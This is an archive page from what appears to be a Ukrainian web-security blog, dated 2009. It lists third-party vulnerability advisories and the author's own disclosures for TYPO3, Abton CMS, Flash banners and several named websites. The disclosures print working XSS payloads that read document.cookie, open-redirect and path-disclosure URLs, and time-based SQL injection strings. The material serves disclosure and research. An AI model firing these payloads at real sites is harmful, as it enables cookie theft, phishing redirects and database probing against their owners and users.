Архів для категорії 'Уразливості'

Добірка уразливостей

16:19 04.12.2009

В даній добірці уразливості в веб додатках:

  • Authentication Bypass in Cisco Unity (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • Creasito e-commerce content manager Authentication Bypass (деталі)
  • FunGamez Multiple Remote Vulnerabilities SQLi (INSECURE-COOKIE-HANDLING) LFI (деталі)
  • WysGui CMS 1.2 BETA (Insecure Cookie Handling) Blind sql injection exploit (деталі)
  • Sungard Banner System XSS (деталі)
  • Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities (деталі)
  • CLAN TIGER CMS 1.1.1 (AUTH BYPASS) SQL-INJECTION (деталі)
  • LittleCMS: Multiple vulnerabilities (деталі)
  • HP Deskjet 6800 XSS in Web Interface (деталі)

Уразливості в TYPO3

19:13 03.12.2009

02.10.2009

У лютому, 06.02.2009, я знайшов Cross-Site Scripting, Full path disclosure та Redirector уразливості в TYPO3. Це популярна CMS. Дані уразливості я виявив на сайті viland.ua, де використовується дана система. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

03.12.2009

XSS:

http://site/index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

Уразливі TYPO3 4.2 CMS та попередні версії.

Уразливості на www.board4all.cz

23:51 02.12.2009

У квітні, 13.04.2009, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://www.board4all.cz. Про що найближчим часом сповіщу адміністрацію проекту.

Уразливості наявні в плагіні vbAnonymizer для vBulletin, про дірки в якому я вже писав.

XSS:

Redirector:

http://www.board4all.cz/redirector.php?url=http://websecurity.com.ua

Добірка уразливостей

16:22 02.12.2009

В даній добірці уразливості в веб додатках:

  • Sarg: Remote execution of arbitrary code (деталі)
  • Squid Analysis Report Generator <= 2.2.3.1 buffer overflow (деталі)
  • Apache ActiveMQ Numerous Cross Site Scripting Issues (деталі)
  • ftpdmin v. 0.96 RNFR remote buffer overflow exploit (деталі)
  • Tiny Blogr 1.0.0 rc4 Authentication Bypass (деталі)
  • CLAN TIGER CMS (module custompage.php) BLIND SQL INJECTION (деталі)
  • CLAN TIGER CMS MULTIPLE COOKIES HANDLING VULNERABILITIES (деталі)
  • CLAN TIGER CMS AUTH BYPASS LOGIN FORM (SQL INJECTION) (деталі)
  • Malleo 1.2.3 Local File Inclusion Vulnerability (деталі)
  • MonGoose 2.4 Directory Traversal Vulnerability (деталі)

Добірка уразливостей

16:11 30.11.2009

В даній добірці уразливості в веб додатках:

  • Cisco Unified Communications Manager Denial of Service and Authentication Bypass Vulnerabilities (деталі)
  • Exjune Guestbook v2 Remote Database Disclosure Exploit (деталі)
  • Directory traversal vulnerability in Horde (деталі)
  • Cross-site scripting (XSS) vulnerability in Horde Application Framework (деталі)
  • Cross-site scripting (XSS) vulnerability in Horde 3.2 and Turba 2.2 (деталі)
  • New pcre3 packages fix arbitrary code execution (деталі)
  • Multiple Vulnerabilities in Novell Teaming (деталі)
  • Phorum < 5.2.10 Cross-Site Scripting/Request Forgery (деталі)
  • Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit (деталі)
  • webSPELL 4.2.0c XSS (BYPASS BBCODE) COOKIES STEALING VULNERABILITY (деталі)

Уразливості на www.helsinki.org.ua

20:08 28.11.2009

27.07.2009

У грудні, 03.12.2008, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.helsinki.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

28.11.2009

Full path disclosure:

http://www.helsinki.org.ua/index.php?id=-

http://www.helsinki.org.ua/index.php?print=-

http://www.helsinki.org.ua/inc/creator.php

http://www.helsinki.org.ua/inc/data/page.php

XSS:

Дані уразливості вже виправлені, але не всі - перші дві Full path disclosure ще не виправлені.

Добірка уразливостей

17:34 27.11.2009

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities in Double-Take 5.0.0.2865 (деталі)
  • Asbru Web Content Management Vulnerabilities (деталі)
  • New moodle packages fix file disclosure (деталі)
  • CA ARCserve Backup Discovery Service Denial of Service Vulnerability (деталі)
  • net2ftp <= 0.97 Cross-Site Scripting/Request Forgery (деталі)
  • Adgregate ShopAd widget validation is vulnerable to replay attack (деталі)
  • SASPCMS Multiple Vulnerabilities (деталі)
  • AdaptBB 1.0 Beta Multiple Remote Vulnerabilities (деталі)
  • Geeklog <=1.5.2 'SESS_updateSessionTime()' vulnerability (деталі)
  • Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit (деталі)

Добірка уразливостей

16:27 25.11.2009

В даній добірці уразливості в веб додатках:

  • Version-independent IOS shellcode (деталі)
  • Step-by-step instructions for debugging Cisco IOS using gdb (деталі)
  • Cisco IOS shellcode explanation - additional (деталі)
  • glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit (деталі)
  • Q2 Solutions ConnX - SQL Injection Vulnerability (деталі)
  • OpenX 2.4.11, 2.6.5, 2.8.0 fix multiple vulnerabilities (деталі)
  • OpenX 2.6.4 multiple vulnerabilities (деталі)
  • OSCommerce Session Fixation Vulnerability (деталі)
  • Remote access vulnerability using File Thingie v2.5.4 (деталі)
  • Family Connections 1.8.2 Arbitrary File Upload (деталі)

Численні уразливості на www.banner.kiev.ua

23:52 24.11.2009

У березні, 20.03.2009, я знайшов численні Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua (банерна мережа UBN). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на forum.banner.kiev.ua.

У флеш баннерах на banner.kiev.ua є XSS уразливість. Якщо вони зроблені згідно з рекомендаціями УБН (попередніми рекомендаціями), то можлива XSS атака (strictly social XSS) через параметр url (при кліку на банер). Про подібну атаку я вже писав в записі XSS уразливості в 215000 флеш файлах.

XSS (флешка з target = “_blank”):

Зазначу, що флешки з target = “_blank” (в getURL) не дозволяють дістатися до cookies. А також вони не працють в IE6 (в деяких випадках при роботі з JS). Якщо target заданий не “_blank” (або зовсім не вказаний), то тоді флешки дають можливість дістатися до кукісів в усіх браузерах (та нормально працють в IE6). В УБН згідно з рекомендаціями (попередніми) target задається “_blank”, але якщо хтось не задав його, то можна буде дістатися і до кукісів.

XSS (флешка з target = “_top”):

В системі УБН зараз біля 150000 банерів, частина з яких - це флеш банери, що мають дану XSS уразливість.

Уразливості в Abton

19:32 24.11.2009

16.02.2009

У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості в системі Abton (це українська CMS). Як раз коли виявив уразливості на uareferat.com, де використовується даний движок. Також про ще одну SQL Injection в даному движку мені нещодавно повідомив Alex (в коментарях).

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

24.11.2009

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/’/

http://site/rus/’/

http://site/rus/referaty/1/-1/

http://site/abton/

На сайті на даному движку є багато подібних уразливостей, що призводять до витоку структури БД.

SQL Injection:

http://site/rus/details/’+benchmark(10000,md5(now()))+’/

http://site/rus/referaty/1′+benchmark(10000,md5(now()))-’1/

http://site/rus/’+benchmark(10000,md5(now()))+’/

Дані уразливості вже виправлені розробниками. Але в системі є чимало нових уразливостей.